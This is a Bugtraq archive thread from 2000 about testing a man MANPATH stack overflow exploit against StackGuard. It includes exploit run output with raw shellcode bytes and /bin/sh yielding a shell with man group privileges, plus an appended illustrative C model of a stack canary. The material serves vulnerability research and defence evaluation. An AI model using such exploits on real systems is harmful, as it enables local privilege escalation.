Bugtraq mailing list archives

Re: No-Exec Stack Smashing 101


From: crispin () WIREX COM (Crispin Cowan)
Date: Thu, 20 Apr 2000 05:00:42 +0000


"Granquist, Lamont" wrote:

Okay, so I'm setting off to exploit the /usr/bin/man MANPATH exploit on
RH6.1 (actually my system is RH6.2 i686 with man-1.5g-6 installed on it).
And I'm looking for a little help here.  What I've been playing with so
far is things like the following trying to sort out the parameters of the
buffer overflow. ... So, anyone got any tips for where to point the RA and
what the stack should look like?

At WireX we've been doing some fresh vulnerability testing.  In the attached
e-mail, M.C.Mar <woloszyn () ipartners pl> describes his work for us
demonstrating an exploit against the man vulnerability, and then
demonstrating that the StackGuarded version of man is not vulnerable.

We are intent on undertaking a continuous evaluation process of testing every
working stack smashing exploit we can find for StackGuard compatible
platforms (x86/Linux, esp. Red Hat).  We would appreciate any help we can get
in getting live exploits to actually work.  We succeeded with man, but failed
with ircii.

Crispin
-----
Crispin Cowan, CTO, WireX Communications, Inc.    http://wirex.com
Free Hardened Linux Distribution:                 http://immunix.org
                  JOBS!  http://immunix.org/jobs.html


From - Thu Apr 20 04:46:54 2000
Return-Path: <woloszyn () ipartners pl>
Delivered-To: crispin () wirex com
Received: from mr1.ipartners.pl (mr1.ipartners.pl [157.25.5.18])
        by mithra.wirex.com (Postfix) with ESMTP id 6C3C93EC14
        for <crispin () wirex com>; Tue,  4 Apr 2000 11:25:20 -0700 (PDT)
Received: from zloty.it.com.pl (zloty.it.com.pl [195.94.200.4])
        by mr1.ipartners.pl (8.9.3/8.9.1/MR1.0) with ESMTP id UAA83999
        for <crispin () wirex com>; Tue, 4 Apr 2000 20:23:08 +0200 (CEST)
        (envelope-from woloszyn () ipartners pl)
Received: from localhost (woloszyn@localhost)
        by zloty.it.com.pl with ESMTP id UAA00373
        for <crispin () wirex com>; Tue, 4 Apr 2000 20:23:07 +0200 (MET DST)
X-Authentication-Warning: zloty.it.com.pl: woloszyn owned process doing -bs
Date: Tue, 4 Apr 2000 20:23:07 +0200 (MET DST)
From: "M.C.Mar" <woloszyn () ipartners pl>
X-Sender: woloszyn () zloty it com pl
To: Crispin Cowan <crispin () wirex com>
Subject: Re: First Penetration Test
In-Reply-To: <38E995DB.4692065C () wirex com>
Message-ID: <Pine.GSO.4.03.10004042007130.28715-200000 () zloty it com pl>
MIME-Version: 1.0
Content-Type: MULTIPART/DIGEST; BOUNDARY=------------B3356C5E2D4CB4E848D2CED2
Content-ID: <Pine.GSO.4.03.10004042007131.28715 () zloty it com pl>


--------------B3356C5E2D4CB4E848D2CED2
Content-Type: TEXT/PLAIN; CHARSET=iso-8859-1
Content-Transfer-Encoding: 8BIT
Content-ID: <Pine.GSO.4.03.10004042007132.28715 () zloty it com pl>

OK. I have only two hours today so I started with man.
I compiled vulnerable man sources (man-1.5g-6.src.rpm) with the regular
egcs-1.1.2-12.i386 I have installed on my RH 6.0. I tuned the exploit to
produce a shell on my system:

[emsi@pipek ~]$ ./a.out
RET: 0xbffff470  len: 4073

sh:F?F   V
      °  NÍ?1Û?Ø@Í?èÜÿÿÿ/bin/sh
Error executing formatting or display command.
System command /bin/gunzip -c /var/catman/cat1/ls.1.gz |F?F   V
                                                           °
NÍ?1Û?Ø@Í?èÜÿÿÿ/bin/sh
?ó
bash$ id
uid=1000(emsi) gid=1000(emsi) egid=15(man) groups=1000(emsi)
bash$

I attached the exploit.

Then I recompiled the vulnerable code with
gcc-2.7.2.3-14_SGc2_SG121.i386.rpm
and tested the StackGuarded code with my exploit:

[emsi@pipek ~]$ ./a.out
RET: 0xbffff470  len: 4073

sh:F?F   V
      °  NÍ?1Û?Ø@Í?èÜÿÿÿ/bin/sh
Error executing formatting or display command.
System command /bin/gunzip -c /var/catman/cat1/ls.1.gz |F?F   V
                                                           °
NÍ?1Û?Ø@Í?èÜÿÿÿ/bin/sh
?ó
man[6129]: Immunix type 2 Canary[7] = 850e2904 died with cadaver ae4bfc74
in procedure display_cat_file.

As I mentioned at the beginning, I have only two hours, so I didn't examine the
vulnerable code to see whether it is possible to exploit the vulnerability
bypassing StackGuard protection.

--
Mariusz Wołoszyn
Internet Security Specialist, IT -- Internet Partners
E-mail: Mariusz.Woloszyn () it pl, woloszyn () it pl

--------------B3356C5E2D4CB4E848D2CED2
Content-Type: TEXT/PLAIN; charset=US-ASCII; name="4man.c"
Content-Transfer-Encoding: BASE64
Content-ID: <Pine.GSO.4.03.10004042023070.28715 () zloty it com pl>
Content-Description:
Content-Disposition: attachment; filename="4man.c"
--------------B3356C5E2D4CB4E848D2CED2--

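The log line above ("Canary[7] = 850e2904 died with cadaver ae4bfc74 in procedure display_cat_file") is the visible half of how StackGuard stops the man overflow: a canary word sits between the function's locals and the saved return address, and the function epilogue compares it against the expected value before returning. The following C program is an added illustration of that mechanism written for this archive page; it is not the attached 4man.c, not StackGuard's compiler instrumentation, and not man's source. It models one frame as a struct (buffer, canary, a stand-in for the return slot), runs an unchecked copy of the kind that caused the bug next to a bounds-checked copy, and reports a canary death in the same wording the log uses. The canary constant is the value from the page's log line; the `display_cat_file` name is likewise taken from the log, and the struct layout and frame size are assumptions of the model, not the real stack layout.

```c
#include <stdio.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

#define BUF_LEN 16

/* Model of one StackGuard-protected frame: the local buffer, the canary that
 * StackGuard places just below the saved return address, and a stand-in for
 * that saved return address.  Layout is an assumption for illustration:
 * buf at offset 0, canary at 16, saved_ret at 20, 24 bytes in total. */
struct guarded_frame {
    char     buf[BUF_LEN];
    uint32_t canary;
    uint32_t saved_ret;
};

/* Canary value copied from the log line on the page, used here only as a
 * recognisable constant; a real canary is chosen at run time. */
static const uint32_t CANARY_VALUE = 0x850e2904u;
/* Placeholder for a saved return address (constructed, not a real address). */
static const uint32_t FAKE_RET = 0x08048000u;

/* Unchecked copy modelling the original defect: `len` bytes are written into
 * the frame starting at buf with no bounds check, so a long input runs over
 * the canary and the saved return slot.  The write is clamped at the end of
 * the modelled frame only so the demonstration stays within this object. */
static void unchecked_copy(struct guarded_frame *frame,
                           const unsigned char *src, size_t len)
{
    unsigned char *dst = (unsigned char *)frame;
    size_t limit = sizeof *frame;
    for (size_t i = 0; i < len && i < limit; i++)
        dst[i] = src[i];
}

/* Epilogue check: returns 1 when the canary is intact and the function may
 * return, 0 when it has been overwritten.  On death it prints the surviving
 * ("cadaver") value the way the StackGuard log on the page does. */
static int canary_check(const struct guarded_frame *frame, const char *procedure)
{
    if (frame->canary == CANARY_VALUE)
        return 1;
    fprintf(stderr, "Canary = %08x died with cadaver %08x in procedure %s.\n",
            CANARY_VALUE, frame->canary, procedure);
    return 0;
}

/* Vulnerable path: copies `input` with no length check, then runs the canary
 * check.  Returns 1 if the frame survived, 0 if the canary tripped. */
int guarded_display(const unsigned char *input, size_t len)
{
    struct guarded_frame frame;
    memset(&frame, 0, sizeof frame);
    frame.canary = CANARY_VALUE;
    frame.saved_ret = FAKE_RET;
    unchecked_copy(&frame, input, len);
    return canary_check(&frame, "display_cat_file");
}

/* Fixed path: the copy is bounded to the buffer, so the canary can never be
 * reached and the check always passes. */
int bounded_display(const unsigned char *input, size_t len)
{
    struct guarded_frame frame;
    memset(&frame, 0, sizeof frame);
    frame.canary = CANARY_VALUE;
    frame.saved_ret = FAKE_RET;
    size_t n = len < BUF_LEN - 1 ? len : BUF_LEN - 1;
    memcpy(frame.buf, input, n);
    frame.buf[n] = '\0';
    return canary_check(&frame, "display_cat_file");
}

/* Helpers that build a constructed input of `len` 'A' bytes (a stand-in for
 * an overlong MANPATH component) and feed it to each path. */
int demo_unchecked(size_t len)
{
    unsigned char input[64];
    if (len > sizeof input) len = sizeof input;
    memset(input, 'A', len);
    return guarded_display(input, len);
}

int demo_bounded(size_t len)
{
    unsigned char input[64];
    if (len > sizeof input) len = sizeof input;
    memset(input, 'A', len);
    return bounded_display(input, len);
}

int main(void)
{
    printf("short input, unchecked copy: %s\n", demo_unchecked(2)  ? "ok" : "canary died");
    printf("long input,  unchecked copy: %s\n", demo_unchecked(40) ? "ok" : "canary died");
    printf("long input,  bounded copy:   %s\n", demo_bounded(40)   ? "ok" : "canary died");
    return 0;
}
```

The point the model makes is the one the test on the page shows: the unchecked copy still overwrites the frame (the bug is unchanged), but the canary comparison turns a silent return-address overwrite into a detected, logged abort in the named procedure, whereas the bounded copy removes the overwrite altogether. The model also shows the limit the author flags at the end of the message: the check runs only in the epilogue, so it says nothing about whether a different write pattern could avoid the canary, which is why he leaves that question open.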

